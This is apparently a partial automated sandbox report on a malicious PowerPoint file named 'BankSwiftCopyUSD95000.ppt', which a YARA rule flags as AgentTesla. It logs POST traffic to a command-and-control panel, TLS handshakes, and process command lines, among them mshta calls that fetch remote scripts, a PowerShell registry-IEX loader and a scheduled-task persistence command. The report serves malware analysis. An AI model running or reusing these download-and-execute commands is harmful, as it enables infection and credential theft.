                                                                                                                                                                                                            Jan 13, 2021 13:45:03.275532007 CET3107OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.397965908 CET3108INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.527234077 CET3114INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:03 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            2192.168.2.224919864.188.18.21880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.973675013 CET3089OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.095396042 CET3090INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.227030039 CET3090INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.655978918 CET3092OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.781065941 CET3093INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.912853003 CET3094INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.999212027 CET3099OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.121244907 CET3099INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.262056112 CET3100INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:02 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            3192.168.2.224920164.188.18.21880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.601350069 CET3115OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.724831104 CET3130INHTTP/1.1 100 Continue


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            4192.168.2.224921764.188.18.21880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 13, 2021 13:45:51.948399067 CET4685OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Jan 13, 2021 13:45:52.072664022 CET4685INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:52.202646017 CET4686INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:52 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:52.559609890 CET4686INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:52 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206911087 CET108.177.127.132443192.168.2.2249168CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194725037 CET104.18.49.20443192.168.2.2249174CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.917670965 CET108.177.127.132443192.168.2.2249178CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.395072937 CET104.18.49.20443192.168.2.2249183CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.158859015 CET104.18.49.20443192.168.2.2249184CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:44:47.191617966 CET108.177.127.132443192.168.2.2249188CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.516547918 CET108.177.127.132443192.168.2.2249192CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.705315113 CET172.67.219.133443192.168.2.2249193CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.462819099 CET108.177.127.132443192.168.2.2249200CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.794524908 CET104.18.49.20443192.168.2.2249206CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.267565012 CET108.177.127.132443192.168.2.2249208CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.734380960 CET104.18.49.20443192.168.2.2249210CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.833523989 CET108.177.127.132443192.168.2.2249213CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.377978086 CET108.177.127.132443192.168.2.2249215CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:43:35
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
                                                                                                                                                                                                            Imagebase:0x13f660000
                                                                                                                                                                                                            File size:2163560 bytes
                                                                                                                                                                                                            MD5 hash:EBBBEF2CCA67822395E24D6E18A3BDF6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:43:38
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
                                                                                                                                                                                                            Imagebase:0x49ff0000
                                                                                                                                                                                                            File size:302592 bytes
                                                                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:43:39
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
                                                                                                                                                                                                            Imagebase:0x13f020000
                                                                                                                                                                                                            File size:2163560 bytes
                                                                                                                                                                                                            MD5 hash:EBBBEF2CCA67822395E24D6E18A3BDF6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:33
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:ping.exe
                                                                                                                                                                                                            Imagebase:0xffea0000
                                                                                                                                                                                                            File size:16896 bytes
                                                                                                                                                                                                            MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:33
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:34
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:ping.exe
                                                                                                                                                                                                            Imagebase:0xff5d0000
                                                                                                                                                                                                            File size:16896 bytes
                                                                                                                                                                                                            MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:37
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x21ac0000
                                                                                                                                                                                                            File size:452608 bytes
                                                                                                                                                                                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:38
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
                                                                                                                                                                                                            Imagebase:0xff140000
                                                                                                                                                                                                            File size:285696 bytes
                                                                                                                                                                                                            MD5 hash:97E0EC3D6D99E8CC2B17EF2D3760E8FC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:40
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                                                                                                                            Imagebase:0xffa70000
                                                                                                                                                                                                            File size:464384 bytes
                                                                                                                                                                                                            MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:40
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:42
                                                                                                                                                                                                            Start date:13/01/2021
